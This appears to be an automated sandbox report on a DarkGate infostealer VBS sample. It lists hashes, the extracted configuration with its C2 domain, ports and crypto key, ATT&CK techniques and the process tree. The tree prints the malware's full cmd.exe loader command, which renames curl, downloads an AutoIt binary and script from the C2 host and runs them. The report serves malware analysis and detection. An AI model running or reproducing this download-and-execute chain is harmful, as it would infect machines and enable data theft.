darkgate | 961372719771b69d8cf4d62f2b3703d7322544d16dc08036a217102382200498

General

Target

Test_395-13959.vbs
Size

6.9MB
MD5

5a9c56d5b6a4ae5fc402d99fa45f5598
SHA1

d1572724ca4ecc99edaf4104f51385265bb27682
SHA256

961372719771b69d8cf4d62f2b3703d7322544d16dc08036a217102382200498
SHA512

5c9ab4ba5c102217077e6b4981f99c1bbf7e0a1842bfe38edcaa5e5b59d3c7bc11a8954eb8917d05dc7addc4023fbc0758e7ed2ddcce861503ff940fcad93e57
SSDEEP

49152:jzgZNELkkGo137QXFsHKCaEcFMICJ/r1lHszS6rY7fch38ZkcwMKvmLXhEbvYrTJ:t

Score

10^/10

darkgate a1111 stealer

Malware Config

Extracted

Family

darkgate

Botnet

A1111

C2

http://getldrrgoodgame.com

Attributes

alternative_c2_port
8080
anti_analysis
true
anti_debug
true
anti_vm
false
c2_port
2351
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
true
crypter_dll
false
crypter_rawstub
false
crypto_key
eYCqpouVyqrXSL
internal_mutex
txtMut
minimum_disk
100
minimum_ram
4096
ping_interval
4
rootkit
true
startup_persistence
true
username
A1111

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate
Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

8 2184 WScript.exe
Downloads MZ/PE file
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation WScript.exe
Executes dropped EXE 3 IoCs

Processes:

omxg.exeomxg.exeAutoit3.exe

pid process

4448 omxg.exe
1800 omxg.exe
2224 Autoit3.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
8	2184	WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	WScript.exe

pid	process
4448	omxg.exe
1800	omxg.exe
2224	Autoit3.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Autoit3.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 8 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	flow	ioc
HTTP User-Agent header	8	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

WScript.execmd.exe

description	pid	process	target process
PID 2184 wrote to memory of 3236	2184	WScript.exe	cmd.exe
PID 2184 wrote to memory of 3236	2184	WScript.exe	cmd.exe
PID 3236 wrote to memory of 4448	3236	cmd.exe	omxg.exe
PID 3236 wrote to memory of 4448	3236	cmd.exe	omxg.exe
PID 3236 wrote to memory of 1800	3236	cmd.exe	omxg.exe
PID 3236 wrote to memory of 1800	3236	cmd.exe	omxg.exe
PID 3236 wrote to memory of 2224	3236	cmd.exe	Autoit3.exe
PID 3236 wrote to memory of 2224	3236	cmd.exe	Autoit3.exe
PID 3236 wrote to memory of 2224	3236	cmd.exe	Autoit3.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Test_395-13959.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2184

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c mkdir c:\omxg & cd /d c:\omxg & copy c:\windows\system32\curl.exe omxg.exe & omxg -H "User-Agent: curl" -o Autoit3.exe http://getldrrgoodgame.com:2351 & omxg -o uujkvu.au3 http://getldrrgoodgame.com:2351/msiomxgnyqu & Autoit3.exe uujkvu.au3
2⤵
- Suspicious use of WriteProcessMemory
PID:3236

\??\c:\omxg\omxg.exe
omxg -H "User-Agent: curl" -o Autoit3.exe http://getldrrgoodgame.com:2351
3⤵
- Executes dropped EXE
PID:4448

\??\c:\omxg\omxg.exe
omxg -o uujkvu.au3 http://getldrrgoodgame.com:2351/msiomxgnyqu
3⤵
- Executes dropped EXE
PID:1800

\??\c:\omxg\Autoit3.exe
Autoit3.exe uujkvu.au3
3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2224

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\omxg\Autoit3.exe
Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\omxg\omxg.exe
Filesize
411KB

MD5
1c3645ebddbe2da6a32a5f9fb43a3c23

SHA1
086f74a35d5afed78ae50cf5586fafffb7845464

SHA256
0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205

SHA512
ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

Download Submit
C:\omxg\omxg.exe
Filesize
411KB

MD5
1c3645ebddbe2da6a32a5f9fb43a3c23

SHA1
086f74a35d5afed78ae50cf5586fafffb7845464

SHA256
0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205

SHA512
ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

Download Submit
\??\c:\omxg\omxg.exe
Filesize
411KB

MD5
1c3645ebddbe2da6a32a5f9fb43a3c23

SHA1
086f74a35d5afed78ae50cf5586fafffb7845464

SHA256
0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205

SHA512
ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

Download Submit
\??\c:\omxg\uujkvu.au3
Filesize
901KB

MD5
660bc32609a1527c90990158ef449757

SHA1
f56b4e1477302b95173b756022248593331f81fd

SHA256
975d1510380171076b122cd556a1a05bd1eca33b98a9fd003fb3662cb8c83571

SHA512
b82e72931e51b270052e0015a55b27a0e6c18394687e2ebbffa9deb804bea2ac97bcb04b1ed3908ba539ce345ec7c57304c2544187cd78ca7f1ab4daf2e868c6

Download Submit
memory/2224-12-0x0000000001580000-0x0000000001980000-memory.dmp

Filesize
4.0MB

Download
memory/2224-13-0x0000000004370000-0x0000000004465000-memory.dmp

Filesize
980KB

Download
memory/2224-14-0x0000000004C40000-0x0000000005003000-memory.dmp

Filesize
3.8MB

Download
memory/2224-16-0x0000000004C40000-0x0000000005003000-memory.dmp

Filesize
3.8MB

Download
memory/2224-15-0x0000000004370000-0x0000000004465000-memory.dmp

Filesize
980KB

Download

Analysis

Sharing